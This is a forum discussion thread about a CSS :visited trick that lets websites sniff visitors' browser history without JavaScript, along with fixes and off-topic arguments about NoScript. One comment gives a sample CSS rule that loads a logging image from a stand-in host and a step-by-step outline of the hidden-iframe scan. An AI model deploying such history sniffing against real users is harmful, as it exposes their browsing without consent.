Sniffing Browser History Without Javascript

Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."

Well, we fixed it...

[slarrg]

You can't tell what sites I've been to if it's Slashdotted!

Old stuff

[kasot]

The CSS history hack has been known since (at least) August 2006: http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html

Re:Old stuff

Long before that, honestly.

There are Firefox extensions that can help protect against this (see http://www.safecache.com/ and http://www.safehistory.com/ ), but they break enough things on the web that even their creators admit they're not terribly practical.

(Disclaimer: Two of the folks that worked on this also worked for awhile on Chromium with me.)

Re:Old stuff

[zmooc]

Bug 57351 - css on a:visited can load an image and/or reveal if visitor been to a site
Reported: 2000-10-19 16:57 PDT by Jesse Ruderman

Re:Old stuff

[glodime]

Bug 57351

Was marked ass a duplicate of 147777
See: https://bugzilla.mozilla.org/show_bug.cgi?id=147777

Vitaly Sharovatov and Walt Gordon Jones have an interesting back and forth on ideas for a proper fix. Search the page linked below for "Walt Gordon Jones" to follow the conversation.
http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/

Walt Gordon Jones summarizes his point:

The idea that the only way to protect your history data is to give up keeping history at all seems broken to me. Just because the information is in the browser, and I may use it in other ways, doesn't mean it has to be used to mark up the rendered HTML on sites I visit. There's nothing that inextricably ties history to the browser's rendering engine.

Re:Old stuff

[Blakey+Rat]

Can you perhaps explain the non-Javascript version in simpler terms than what's on the story's webpage? The explanation on the page is either very vague, or over my head. (Or both.)

I fully understand how you can use Javascript to grab the computed style of the A tag and figure out if it matches the ":visited" style you have defined, but what I don't get is how he's grabbing the style using only server-side technologies. Since when is it possible for a web server to tell the computed style of an element?

Re:Old stuff

[rytier]

moderation undo (sorry for OT)...

Re:Old stuff

[Blakey+Rat]

Oh wait, I think I just got it.

What he's doing is setting your CSS A:visited property to a image URL, which is defined based on your browser session. Something like:
a:visited { background-image: url( http://scansite.com/image.gif?s=yahoo_com&c=45353535 ); } Then he's coded up a PHP script that'll log the code at the end of the image URL, and track it in your PHP session variable, or a database.

So, the flowchart looks like:
1) User visits page
2) PHP script generates session ID for the visit
3) PHP script writes an invisible iframe to the page, which includes
  - a link to an Target URL (the URL you're trying to find in the history)
  - a CSS rule defining the A:visited image to be a particular URL + a code for the Target URL + your session ID
  - a meta-refresh tag that instructs the server to refresh the iframe with the next Target URL on the list
4) When the iframe refreshes, the PHP feeds out a list of which Target URLs your session ID has been seen at

Ironically, IE's dubious "click on reload/redirect" feature is (currently) the most effective defense against this technique, as the user isn't likely to notice the constant clicks emanating from their browser while this attack is taking place.

Clever stuff. Someone let me know if I'm off-base on this explanation, but if it's not exactly what he's doing, I'm sure this would work as well.

Re:Old stuff

[black6host]

Sure... Me, I can just turn off my history if I don't want sites sniffing it this way. What ever made me think, in this day and age, that anything I do, on the net or not, is private?

Sorry, not to bash you, just sad commentary.....

Re:Old stuff

[Keeper+Of+Keys]

I for one would be quite happy if browsers disabled the ability to use the :visited pseudoclass in your own CSS, which would kill this one stone dead. It's hard enough getting designers to specify :hover states for links, and practically impossible to get :active states out of them - if they're even needed, which is debatable. Who bothers with :visited states? In anything other than body text, users are unlikely to understand why a certain link looks different anyway. It is occasionally useful to spot that a link embedded in text is one you've already followed, but invariably this is the browser's default styling showing through. Perhaps values of 'inherit' should be allowed, so you can turn off the browser default, but otherwise... pfff! get rid of it.

Re:Old stuff

[eiMichael]

Just make "visited" only apply within that domain, like a bastardized cookie. I don't care that us.gov knows which other us.gov links I've been to, but I don't want my browser reporting that I've also been to al-quada.org.

Re:Old stuff

[Philip_the_physicist]

Alternatively, make browsers download all the pseudoclasses for links, so that it is impossible for sites to use this to track users, but without removing the utility of having marked "visited" links. This could be done by browsers without needing any change to the standards, AFAICT.

Re:Old stuff

[drinkypoo]

This could be done by browsers without needing any change to the standards, AFAICT.

It can't be done without generating a lot of unnecessary bandwidth, though, and harshing major on dialup users (who are already getting their asses kicked hard enough.)

Re:Old stuff

[pavon]

No it wouldn't. Most legitimate sites don't do anything exotic with the visited property, they just change color or font properties. Even those that do use the background property or some other property that accepts urls will have a single url that applies to all or a large class of visited links. The only sites that would generate a lot of bandwidth are the tiny minority that intentionally have a different visited resource for each link on their site. They have an interest in keeping this bandwith low themselves and will make those resources to be as small as possible. Hell, the CSS dictating all these resources might even be as large as the resources themselves. Honestly, this is a complete non-issue compared to the bandwidth problems caused by plain old bad site design.

Re:Old stuff

[zobier]

Alternatively, add
a:visited { background-image: none ! important; }
To your userContent.css
I can confirm that this works.

big issue is NoScript

[bcrowell]

I'd care a lot more about this if NoScript was still a viable option. NoScript has become malware at this point. The real issue is the need for someone more trustworthy to make a simpler, and more trustworthy replacement for NoScript. Please? Pretty please?

Re:big issue is NoScript

This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!

Re:big issue is NoScript

[bcrowell]

Stop overreacting, that is old news and long since fixed.

Letting someone else's code run on my computer is an act of trust. Once they've shown they're untrustworthy, that's it, as far as I'm concerned. The world's best security software is no good if the author is someone who's demonstrated at least once that you can't trust him.

NoScript is no more "malware" than Firefox itself.

This is an interesting statement, but I don't understand your reasoning. Maybe you could explain more. Have the developers of Firefox done something untrustworthy?

I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit,

I don't understand how you know so much about my computer. Maybe you could explain more how you became so well informed about what's on my hard disk. I'm running Ubuntu. Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system? Are you aware of a lot of malware that's been observed in the wild infecting Ubuntu systems? If so, I'd be very interested to hear about it.

Re:big issue is NoScript

[bcrowell]

It seems like it's been fixed.

The issue isn't that the software had a bug that had to be fixed. The issue is that the author of the software has shown himself to be untrustworthy by making his software interfere with other software, for the purpose of increasing his own financial gain from ads.

Re:big issue is NoScript

[gavron]

You CAN mod and comment. When you make the comment, the mods you made go away. If you comment first, you cannot mod.

So the mods could come in here and explain, but then their mods would be gone :)

Heisenberg, we hardly knew ya.

E

Re:big issue is NoScript

[mrmeval]

He was trying to work around a problem with easylist and handled it badly but easylist is as much to blame for targeting him.

He answers his emails if you care to ask but easylist has ignored me so far.

Re:big issue is NoScript

[Blue+Stone]

If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to appologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

Unless you're one of those people who believes that anyone less than perfect with a flawless record of behaviour deserves to be castigated for all time for their transgressions, i suggest you consider a concept called 'forgiveness' which, I believe is most appropriate where the transgressor shows genuine remorse. It seems applicable in this situation, but of course, I can only speak for myself.

(I don't know the guy & I use both noscript and adblock+ with easylist)

Re:big issue is NoScript

[Korin43]

Easylist blocks ads. Easylist blocked an ad on his site. How is this their fault? They are doing exactly what they say they do.

Re:big issue is NoScript

[NimbleSquirrel]

On the surface it seems like NoScript had descended into the point of malware, but take a look into the history of why Giorgio did what he did and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.

Yes, there needs to be a more trustworthy NoScript, but at the same time there also need to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.

I, personally have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.

Re:big issue is NoScript

[Barny]

Yeah, I find a proxy based solution much better for keeping the bad things out, also has the bonus of protecting my steam browser, my mobile phone browser (when browsing on my wireless) and other in-game browsers for different games.

NoScript is to stop a problem specific to that web browser (namely its masochistic tendency to run scripting like it was "the last line of crack it was ever going to get"), whereas ad sites are needed to be blocked no matter what browser you are on (even lynx).

Re:big issue is NoScript

[VGPowerlord]

If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to appologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

From what I hear, he only "apologized" and fixed the problem for several reasons:
1. Because the Firefox devs said that NoScript was breaking Firefox's Add-on Policy when it started monkeying around with AdBlock Plus.
2. NoScript's rating was plummeting on the Firefox Add-on site. If this rating drops too much, NoScript would no longer be considered a trusted add-on, and therefore every version would be subject to security review before it exited the Sandbox.

Oh, yes, you read that correctly. NoScript is currently not reviewed before new versions go up on the Firefox add-on site.

Incidentally, Mozilla made a new policy spelling out some restrictions for add-ons after this incident.

Re:big issue is NoScript

[supernova_hq]

Don't confuse forgiveness with trust.

If someone borrowed your car and backed into a telephone pole, you would be upset. If they paid for the damages, you would probably forgive them. But the question is: Would you trust them with your car..?

Re:big issue is NoScript

[yoyhed]

Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system?

Does Ubuntu come with emacs?

Re:big issue is NoScript

[Bill+Dog]

Whether to stop trusting after one "mistake" is a personal decision. But one betrayal is evidence of untrustworthiness.

Re:big issue is NoScript

[arose]

Half apology, half counterattack.

Most of his users want stuff blocked not look at his ads, they don't consider him or google special, why not white list all advertisers, not only his own? Not to mention the update mill and resulting page visits. If he could manage to not realize what the hell he was doing once (and I'm not sure I believe that, the default white list and updates had made me iffy even before the incident), he can do it again. I don't want to be there when that happens, not after opening adblock plus one day and seeing white lists Inever added and Inever had EasyList, just a handful of manually added rules.

Re:Will it..

[orange47]

its easy to tell, with that nickname of yours.. :)

How to interpret results

[noidentity]

If the server responds

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

then it means you've come from Slashdot.

Doesn't work on me

[MrMista_B]

Doesn't work on me - Firefox, with adblock plus, element hiding helper, and flashblock, running whatever the latest Ubuntu is.

Re:Doesn't work on me

[Kotoku]

Awesome! Now for all the people who can take and act upon that advice, we can protect .000001% of the population.

It's a start!

Old, sure...

[sootman]

... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)

Re:For the Masses

[CopaceticOpus]

Anyone who allows their browser to cache and keep a history is stupid? Perhaps your tin foil hat is a size too small.

Re:For the Masses

[digitalunity]

Maybe just clear your cache more often. It's easy, fast and good practice. Ctrl-Shift-Del, press enter.

Do this every time you close FF.

Re:For the Masses

[Goaway]

Some of us actually use the browser history.

Re:It requires an iframe, so noscript will help yo

[yacc143]

It does not require an iframe. It's just that this way it's easier to hide any visual clues.

The basic hack works simple. It sets a different style for visited links. (As such it will only match exact URLs). And one of the cool things your style for visited links specifies is a background URL that works as a webbug.

yacc

Re:For the Masses

[MightyYar]

Most people will never understand and basic exploits like this will always work against them.

So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

Alarming?

[actionbastard]

From an exploit standpoint, no. From an editorial standpoint, yes.

Re: Alarming?

[transporter_ii]

Well, at least I don't have the hiccups any more.
.
.

Re:For the Masses

[Opportunist]

And some of us use one browser for their everyday surfing and one for the naughty pages... I mean, I would do that if I surfed to naughty pages, of course...

Re:For the Masses

[sootman]

Small but important distinction: this exploit is for browser history, not cache. That shortcut (or shift-command-delete* on a Mac) will bring up the 'clear private data' dialog which covers browser history (the one this exploit is for), download history, saved form and search history, browser cache, and other items.

* Unlike PCs, which have 'backspace' and '(forward) delete' buttons, Macs have two buttons labeled 'delete' or 'del'--the big one which is backspace, and the small one next to help, home, end, etc., which is forward delete. That's the one you need for this shortcut. I imagine laptop users and people who use those new small keyboards are SOL.

In Soviet Russia, web sites visit you

[Skapare]

I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc, for each site I visit via by the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window". Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

Re:In Soviet Russia, web sites visit you

Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

Script plz?

This has been a pet peeve of mine for ages. I've got a bunch of users in a Windows environment without Cygwin, but I'd translate the shell script into DOS .BAT if that's what it takes to solve this problem.

Re:In Soviet Russia, web sites visit you

[Blakey+Rat]

So... you posted just to brag about the extreme efforts you go to to support your irrational paranoia?

Thanks, I guess?

Re:How To Fix Without Breaking CSS

[Skapare]

IMHO a better fix is to completely disable looking up browser history for link styling. Let it treat all links as unvisited if there is no difference in styling these different classes of links. Make it the default to use the same style (most people don't care). Then re-enable the lookup if the styles are changed and the result of the change is 2 or more different styles (and pop up a warning that JS and CSS and see these style variations and this can expose detection of sites you have visited).

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:Web Bug Blockers

[Snowblindeye]

You should only load remote images on demand.

[...]

Yeah , I know must be new here..

You're not new here, I can tell by the fact that you didn't read the article. Or the summary ;)

This feature actually works like you want it to: It *does* load on demand. And that's the problem here. If it always loaded it this exploit wouldn't work. Its based on only being loaded on demand.

Re:Chrome

[Z80xxc!]

would be a lot easier if I could run two separate instances of Firefox simultaneously.

Send Firefox developers a polite nasty-gram, telling them that you want the ability to open a second, third, or even fourth instance of FF in seperate memory space.

This functionality already exists.

"%programfiles%\Mozilla Firefox\firefox.exe" -P "profile to use" -no-remote

Re:For the Masses

[dmomo]

It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality all together. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.

If a page has the rule: a:visited { color: red; }

And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');

I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.

The point here is, the solution is not dead simple.

Re:OT: Re:big issue is NoScript

[BrokenHalo]

the "no mod and comment" rule is perhaps one of the most ill-concieved rules I have seen.

Then perhaps you haven't understood the concept behind the rule. The idea is to prevent individuals having unrestrained ability to push an agenda of their own: hence mod or post, but not both.

Unlike some other long-standing rules on this forum, this is one that actually has very sound reasoning behind it.

Re:For the Masses

[Keeper+Of+Keys]

is there really a good need or use for a hidden flag on iframes at all??
I honestly don't know, maybe its one of the more handy features in there, and I just don't see it from the user side of things, but 'hidden' is not an attribute I would ever imagine wanting on a frame or iframe...

With CSS you can hide anything you want to, in a number of different ways, and there are myriad reasons for wanting to do this. Most ajax sites would look a lot worse if the frames they use to silently load your data in the background were suddenly visible.

simple block

putting the rule
a:visited {
          background:none !important;
in userContent.css seems to stop this particular scan.

Re:For the Masses

[aamcf]

Unless you're visiting illegal sites.

Or sites that are unpopular among your peer group.

And what about people in repressive regimes who visit illegal sites?

By exposing your history, there is pressure on you to conform to the standards of those who hold power over you. Not a good thing.

Re:For the Masses

[MrMr]

I like having my browser history so I can tell if I've read something or not.
I think you'll find that ./ has found a way around that trick.
Just duplicate a story from 2000, 2006 and 2009 with slightly different url's.

Re:Will it..

[tiananmen+tank+man]

The parent post is marked informative? Informative like it is easy to tell who is a terrorist by the length of their beard?

Simple...

[BrokenHalo]

No, the simplest solution is to adopt a policy I took up in the late '90s when it first occurred to be that my history might be sniffed:

Delete it.

That's right. It's perfectly possible to live a fulfilled life without browser history, or cookies for that matter. In fact, I still have my cookies file symlinked to /dev/null, though I am aware that current browsers offer an option to clear it...

Re:Disable :visited in Firefox

[fcparfait]

layout.css.visited_links_enabled = false

Note: this works only in Firefox 3.5 (Beta/Preview).

By the way, if you are using Firefox 3.5 with layout.css.visited_links_enabled = false and you still want some visual clue for visited links, try my Link Status extension! (How pushy....)

layout.css.visited_links_enabled

or change the about:config setting called "layout.css.visited_links_enabled"